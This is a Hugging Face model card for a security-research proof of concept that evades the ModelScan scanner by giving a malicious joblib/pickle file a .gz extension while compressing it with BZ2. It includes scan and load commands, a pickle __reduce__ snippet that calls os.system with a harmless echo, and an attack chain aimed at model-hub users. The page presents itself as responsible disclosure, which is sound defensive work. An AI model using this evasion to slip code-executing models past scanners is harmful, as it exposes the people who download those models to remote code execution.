Hugging Face's logo

sandeep1337
/
modelscan-bypass-compression-mismatch

Model card Files
xet
Community
YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

ModelScan Bypass - Compression Method Mismatch

Security Research - ModelScan Bypass Technique

Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.

Technique

Compression method mismatch

File extension indicates gzip (.gz) but content is BZ2 compressed

ModelScan Result

SKIPPED - Scanner did not analyze this file

File

  • exploit_compression_mismatch.joblib.gz

Reproduction Steps

Testing with ModelScan 

# Install ModelScan
pip install modelscan

# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_compression_mismatch.joblib.gz

Expected Result

SKIPPED - Scanner did not analyze this file

Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION) 

import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_compression_mismatch.joblib.gz')

Technical Details

This exploit uses Python's pickle __reduce__ method for RCE:

def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))

Why ModelScan misses this:

File extension indicates gzip (.gz) but content is BZ2 compressed

Security Impact

Severity: HIGH

Attack Vector:

  1. Attacker creates malicious model using this technique
  2. Uploads to model hub (HuggingFace, etc.)
  3. Victim downloads and scans with ModelScan
  4. Scanner reports "No issues found!" or skips the file
  5. Victim loads model → RCE

Part of Larger Research

This is one of four bypass techniques discovered:

  1. Compression Mismatch
  2. Double Compression
  3. Corrupt Header
  4. Memmap Bypass ⭐ - PRIMARY FINDING

Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

Date: December 25, 2024 Researcher: Security Research Team

References

Disclaimer

⚠️ For Security Research Only

This file is provided for security research and vulnerability disclosure purposes only. Do not use this technique for malicious purposes. Loading this file will execute code.

Status: Under responsible disclosure to Huntr bug bounty program

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support